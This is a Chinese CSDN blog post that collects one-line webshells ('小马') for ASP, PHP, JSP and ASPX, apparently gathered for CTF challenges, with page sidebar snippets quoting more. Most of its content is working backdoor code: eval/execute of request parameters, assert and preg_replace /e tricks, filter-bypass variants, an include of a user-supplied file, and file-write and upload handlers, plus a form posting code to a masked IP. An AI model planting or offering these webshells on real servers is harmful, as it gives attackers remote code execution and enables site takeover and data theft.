各种小马小结

最新推荐文章于 2022-05-19 21:03:43 发布
最新推荐文章于 2022-05-19 21:03:43 发布
阅读量9k 收藏 13
点赞数 1
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35078631/article/details/77743794
版权

最近总是碰到小马的题目,心想还是小小收集一下各种的小马,碰到新的再更新

ASP

<%eval request("sb")%>

<%execute request("sb")%>

<%execute(request("sb"))%>

<%execute request("sb")%><%'<% loop <%:%>

<%'<% loop <%:%><%execute request("sb")%>

<%execute request("sb")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("sb"))</script>

<%execute request("sb")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("sb"))</script>

%><%Eval(Request(chr(35)))%><%

<%eval request("sb")%>

<%ExecuteGlobal request("sb")%>

if Request("sb")<>"" then ExecuteGlobal request("sb") end if

PHP

<?php eval($_POST[sb])?>



<?php @eval($_POST[sb])?> //容错代码



<?php assert($_POST[sb]);?> //使用lanker一句话客户端的专家模式执行相关的php语句



<?$_POST['sa']($_POST['sb']);?>



<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>



<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>

//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入



<O>h=@eval($_POST[c]);</O>



<script language="php">@eval($_POST[sb])</script>

//绕过<?限制的一句话

<?=@eval($_POST['cmd']);
//这个也是吊炸天...

<?=`*`;
//吊炸天!大致上等价于
//<?php echo `bash bash2 index.html p.php` ?>
//访问p.php的时候,bash就会执行bash2这个文件里的命令,后面的文件无视掉
//通过修改bash2这个文件的内容就可以构造命令执行。


$filename=$_GET['xbid'];
include ($filename);
//危险的include函数,直接编译任何文件为php格式运行

$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件

JSP

<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>


<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
<input type=submit value="提交">
</form>

ASPX




<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
//Jscript的asp.net一句话


<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"])   ); }%>
//C#的asp.net一句话


<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
//VB的asp.net一句话
Assassin__is__me
关注
  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
asp 一句话小马_一句话木马:ASP
weixin_39762441的博客
12-29 780
ASP一句话木马收集:""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>"" then ExecuteGlobal request("c") end if%>< %'eval(request("c"))execute request("#")U...
超小PHP小马小结(方便查找后门的朋友)
12-19
作者: spider 我也来个超小PHP小马 复制代码 代码如下: <?php header(“content-Type: text/html; charset=gb2312”); if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); ?&...
aspx大小马
11-02
朋友的专业大马,发出来大家使用,大家不要客气,踊跃下载,现在大马的有用资料不多呢:)
垃圾代码二三行 ASPX小马
10-30
垃圾代码二三行 ASPX小马
web上传小马
10-07
构造上传页面,可以上传webshell大马进一步得到网站权限ASP
asp 一句话小马_一个ASP小马
weixin_39681058的博客
12-29 384
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=...
aspx原型马
11-24
aspx原型马,可以用来研究aspx马的原理,方便学习网络安全知识,但请不要做坏事。
一只神奇的asp小马
一个码农的笔记
12-16 4854
<% dim file,content,path,task,paths,paths_str,nn,nnfilename,dpath,htmlpath,htmlpath_,htmlpath_str,addcontent,includefiles,noincludefiles,filetype,hanfiles,recontent,site_root,defaulthtml,defaultreplac
Linux input子系统学习小结
12-20
### Linux Input 子系统学习小结 #### 一、基本框架 Linux Input 子系统是内核中的一个重要组成部分,用于处理各种输入设备的数据。它的设计目的是为了提供一个统一且灵活的接口来支持多种类型的输入设备,包括...
人工智能习题集及各章小结.pdf
11-27
人工智能习题集及各章小结
Aspx一句话网马Webshell.rar
01-07
Aspx一句话网马Webshell.rar
部编人教第五单元知识小结.docx
09-09
【部编人教第五单元知识小结】 本单元的知识点主要涵盖了字词、近义词、反义词、成语、量词、修饰词、句子描绘 和寓言故事等多个方面,旨在帮助学生巩固语文基础,提升语言运用能力。 一、字词盘点 1. 字:强调了...
新人教统编版一年级上册语文 第八单元知识小结.docx
10-12
这篇文档是针对新人教统编版一年级上册语文第八单元的知识点进行的小结,涵盖了汉字拼音、字形、字义、词语搭配、近反义词、重点句子理解等多个方面。 首先,文档强调了正确读准字音的重要性,如“洞(dòng)口”、...
史上真正最小的ASP小马
weixin_30423977的博客
12-13 366
经过狂精简. <%set z=server.createObject("Adodb.Stream") z.Open z.writetext request("x") z.SaveToFile server.mappath("o.asp"),2 set z=nothing%><form method=post><input type=submit><text...
(48.1)【WAF绕过-权限控制】webshell、小马、权限脚本、权限工具
05-19 1277
【权限控制】脚本、木马、工具
新人教统编版五四制二年级下册语文 第五单元知识小结.docx
10-12
这篇文档是针对新人教统编版五四制二年级下册语文第五单元的知识点进行的小结,涵盖了字词、近反义词、词语归类、佳句积累和考试热点等内容,旨在帮助学生巩固学习成果。 首先,字词盘点部分强调了易错字的读音和...
05.新部编人教版二年级下册语文第五单元知识小结.docx
09-08
10. **考点提示**:提示了两个重要课文——“寓言二则”和“画杨桃”中的主要内容及其教育意义,以及“小马过河”中的人物对话,这些内容在课内阅读题目中可能会被考察。 通过以上内容的学习,学生可以巩固汉语基础...
校验矩阵怎么判断最小马
最新发布
05-30
校验矩阵判断最小马鞍点的方法是:对于校验矩阵H的每一个元素H(i,j),如果它是H的第i行中最小的元素,并且它是H的第j列中最大的元素,那么它就是H的一个最小马鞍点。如果校验矩阵H中存在最小马鞍点,那么它们的数量是唯一的,等于矩阵的秩r。这些最小马鞍点所对应的列向量就是码字生成矩阵G中的一组线性无关的列向量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值